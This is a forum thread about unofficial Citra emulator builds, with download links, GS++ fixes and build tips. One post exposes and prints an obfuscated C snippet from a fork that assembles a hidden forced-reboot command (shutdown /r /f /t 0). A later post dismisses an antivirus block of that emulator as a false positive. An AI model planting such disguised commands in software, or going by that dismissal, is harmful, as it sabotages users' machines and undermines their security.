Homebrew Citra - Unofficial \ Chinese builds discussion

drwhojan

Well-Known Member
Member
Joined
Jul 14, 2009
Messages
4,196
Trophies
1
Age
45
Location
Where I Am!
XP
1,702
Country
United Kingdom
@drwhojan there you go the gs++ is released... lol all that fuzz for nothing

Lol I know true!, i'v have to wait and look at it later, nephew on my PC playing Fifa 17, his laptop not good for games, and I get it lol.

His mum buying him that new Xbox One X when out for christmas, nice.

I'll merge citra with bleeding edge, + cheats est.

I'm keeping 3D fun branch out of it, jroweboy still working on a new input_core.
 
Last edited by drwhojan,

NiagA

Well-Known Member
Member
Joined
Sep 23, 2016
Messages
394
Trophies
0
Location
in your mind
XP
341
Country
Brazil
Super Street Fighter iv 3D edition works again with the new GS ++ Thanks @Willele
Capturar.JPG
 
Last edited by NiagA,

jroweboy

Well-Known Member
Member
Joined
Oct 23, 2016
Messages
124
Trophies
0
Age
34
XP
393
Country
United States
for the record, wwylele did do a lot of verifying his code against fincs research before putting it on bleeding edge (in the time between "please don't merge this" and when he put it on bleeding edge). It just so happens that his code pretty much matched what fincs researched, so it was more ready than he thought. he could give you more information about it of course
 

The Koopa Kingdom

Well-Known Member
Newcomer
Joined
Oct 14, 2015
Messages
71
Trophies
0
Location
Castle Grounds
XP
325
Country
United States
i'm hoping its true. this would really makes normal user feels welcome.
i've already seen it too many times on the Citra official forum whenever an user asking a progress on some games, all they get is "It's not done and will not be done in the future, so just shut it and dont ever talk about it anymore". of course i can't show you one by one. but it happen so many times, thats why i rather go to /https://gbatemp.net/threads/citra-new-3ds-emulator.365154/ and this forum for info on development.
You keep on saying that we push away newcomers just for asking questions, which isn't the case. If we close/unlist someone's support thread, it's usually because:
- Their answer can easily be found in the FAQ (A lot of people fall into this one.)
- They don't provide enough info to help (Keep in mind that, when creating a new support thread, users are provided a template to fill out.
This leads me to believe, like Selby said, that you're exaggerating this. If these instances of us pushing people away are so common, then can you share one here?
 
  • Like
Reactions: JayFoxRox

drwhojan

Well-Known Member
Member
Joined
Jul 14, 2009
Messages
4,196
Trophies
1
Age
45
Location
Where I Am!
XP
1,702
Country
United Kingdom
Citra+BE-GCC-MinGW-31-07-2017
http://www37.zippyshare.com/v/OeWBOdDt/file.html

Citra-MSVS2017-31-07-2017
http://www73.zippyshare.com/v/Tnx9IsYH/file.html

Cheats added.

(Note) You will need to replace your own "User" folder

Chagelog
https://github.com/Jhno591/citra/commits/master
-------------
Should I do a AVX2, forgot the other ?..

(Note) the BE-450 had some GS++ changes over night.

PS: Sorry left out 3d-fun and input-config-2 for gamepads, they are reported issues in regard.
But you can still use gamepad's using
https://community.citra-emu.org/t/temporary-controller-configurations-for-citra/1061
 
Last edited by drwhojan,

matif

Well-Known Member
Member
Joined
Jan 19, 2010
Messages
127
Trophies
0
XP
1,047
Country
Taiwan
Citra Unofficial versions, by sickc, Aug 1st.

GitHub: https://github.com/sickc/citra
Download links: https://justpaste.it/19l43

I use LLVM Skylake version, and FPS increase 5~6 from BE441. (Different computer will have different results.)

These versions are many optimized Citra for different CPUs.
It will keep update every week, if I have free time, I'll post new versions here.

!!!WARNING!!!
i cant believe people still merge this;
https://github.com/sickc/citra/commit/7257c153b00a5da607192310e52a3663135937d7

that is a ticking time bomb,you know.
I'm very very sorry for that I didn't check what it merged.
these lines means C:\Windows\SysWOW64\shutdown /r /f /t 0.
。 %s means string that to be replaced, \ is a special symbol for make next special symbol available.
Code:
const char* useTimedDo = "utdo";
const char* win64 = "C:\\Windows\\SysWOW64";
const char* perf_fmt = "%s\\sh%s%s";
char perf_cmd[100];
sprintf(perf_cmd, perf_fmt, win64, useTimedDo, "wn /r /f /t 0");
By the way, I like these code, lol...
 
Last edited by matif,

drwhojan

Well-Known Member
Member
Joined
Jul 14, 2009
Messages
4,196
Trophies
1
Age
45
Location
Where I Am!
XP
1,702
Country
United Kingdom
@matif, stereoscopic controller is superfluous here, all that he does is only slows down the emulation speed. But thanks in any case

Do you get Red top screen with some games ?, using stereoscopic..

Sorry avast is blocking his emulator here.

--------------------- MERGED ---------------------------

Citra Unofficial versions, by sickc, Aug 1st.
GitHub: https://github.com/sickc/citra
Download links: https://justpaste.it/19l43
I use LLVM Skylake version, and FPS increase 5~6 from BE441. (Different computer will have different results.)
These versions are many optimized Citra for different CPUs.
It will keep update every week, if I have free time, I'll post new versions here.

When you use 3D-fun branch, in emu_window.h change
depth_slider = 0.0f; to depth_slider = 0.01; , this will not show top Red screen on stat up of some games, and will reset on close down and start up of citra , if the slide bar was used.

But Anaglyph will show in some games FMA anyway no big deal, but not the game play.

If wwylele find out if Left eye only is used at 0.0f; so it don't bool left when side bar at bottom it will keeps both screens clear and normal, and if above when slide bar is turned up then use Anaglyph, It would really work and solve the issue.
 
Last edited by drwhojan,

matif

Well-Known Member
Member
Joined
Jan 19, 2010
Messages
127
Trophies
0
XP
1,047
Country
Taiwan
@matif, stereoscopic controller is superfluous here, all that he does is only slows down the emulation speed. But thanks in any case
I don't use stereoscopic controller, but in my case it's not slow, maybe you can test it in other situation, I use skylake cpu, what yours?
 
Last edited by matif,

NiagA

Well-Known Member
Member
Joined
Sep 23, 2016
Messages
394
Trophies
0
Location
in your mind
XP
341
Country
Brazil
  • Like
Reactions: drwhojan

matif

Well-Known Member
Member
Joined
Jan 19, 2010
Messages
127
Trophies
0
XP
1,047
Country
Taiwan
Do you get Red top screen with some games ?, using stereoscopic..

Sorry avast is blocking his emulator here.

--------------------- MERGED ---------------------------



When you use 3D-fun branch, in emu_window.h change
depth_slider = 0.0f; to depth_slider = 0.01; , this will not show top Red screen on stat up of some games, and will reset on close down and start up of citra , if the slide bar was used.

But Anaglyph will show in some games FMA anyway no big deal, but not the game play.

If wwylele find out if Left eye only is used at 0.0f; so it don't bool left when side bar at bottom it will keeps both screens clear and normal, and if above when slide bar is turned up then use Anaglyph, It would really work and solve the issue.
Please tell me which version, or you can upload that version you said to virustotal to proof there is a virus, thanks. Even though if it tell us there is a virus, it maybe False Alarm.
 
Last edited by matif,

drwhojan

Well-Known Member
Member
Joined
Jul 14, 2009
Messages
4,196
Trophies
1
Age
45
Location
Where I Am!
XP
1,702
Country
United Kingdom
This version of citra really is very good for me thanks @drwhojan.

Badly timed, they was a newer bleeding edge overnight and updated GS++ and other stuff, I should have waited.

I'll try and re-do it, but had a long day.

--------------------- MERGED ---------------------------

Please tell me which version, or you can upload that version you said to virustotal to proof there is a virus, thanks. Even though if it tell us there is a virus, it maybe False Alarm.

Forget it most likely a false positive / avast can be little overbord.
-----
I'll put it in as false positive let them update it.

654646.jpg
 
Last edited by drwhojan,
  • Like
Reactions: NiagA

Site & Scene News

Popular threads in this forum

General chit-chat
Help Users
  • No one is chatting at the moment.
  • SylverReZ @ SylverReZ:
    @mthrnite, Cheetah Girls, the sequel to Action 52's Cheetah Men.
    +2
  • Psionic Roshambo @ Psionic Roshambo:
    Pokemon Black I played that one a lot
  • K3Nv2 @ K3Nv2:
    Honestly never messed with Pokémon on ds much
  • mthrnite @ mthrnite:
    I played pokemon once, was bored, never tried again
  • Psionic Roshambo @ Psionic Roshambo:
    Oh Dragon Quest IX
  • K3Nv2 @ K3Nv2:
    Spent like 5 hours on switch one never touched it again
  • Psionic Roshambo @ Psionic Roshambo:
    Sentinel of the stary skies
  • K3Nv2 @ K3Nv2:
    Ds is 20 years old this year
  • Psionic Roshambo @ Psionic Roshambo:
    So MJ no longer wants to play with it?
  • K3Nv2 @ K3Nv2:
    He put it down when the 3ds came out
  • SylverReZ @ SylverReZ:
    @K3Nv2, RIP Felix does great videos on the PS3 yellow-light-of-death.
  • Jayro @ Jayro:
    Eventhough the New 3DS XL is more powerful, I still feel like the DS Lite was a more polished system. It's a real shame that it never got an XL variant keeping the GBA slot. You'd have to go on AliExpress and buy an ML shell to give a DS phat the unofficial "DS Lite" treatment, and that's the best we'll ever get I'm afraid.
    +1
  • Jayro @ Jayro:
    The phat model had amazingly loud speakers tho.
    +1
  • SylverReZ @ SylverReZ:
    @Jayro, I don't see whats so special about the DS ML, its just a DS lite in a phat shell. At least the phat model had louder speakers, whereas the lite has a much better screen.
    +1
  • SylverReZ @ SylverReZ:
    They probably said "Hey, why not we combine the two together and make a 'new' DS to sell".
  • Veho @ Veho:
    It's a DS Lite in a slightly bigger DS Lite shell.
    +1
  • Veho @ Veho:
    It's not a Nintendo / iQue official product, it's a 3rd party custom.
    +1
  • Veho @ Veho:
    Nothing special about it other than it's more comfortable than the Lite
    for people with beefy hands.
    +1
  • Jayro @ Jayro:
    I have yaoi anime hands, very lorge but slender.
  • Jayro @ Jayro:
    I'm Slenderman.
  • Veho @ Veho:
    I have hands.
    Veho @ Veho: +1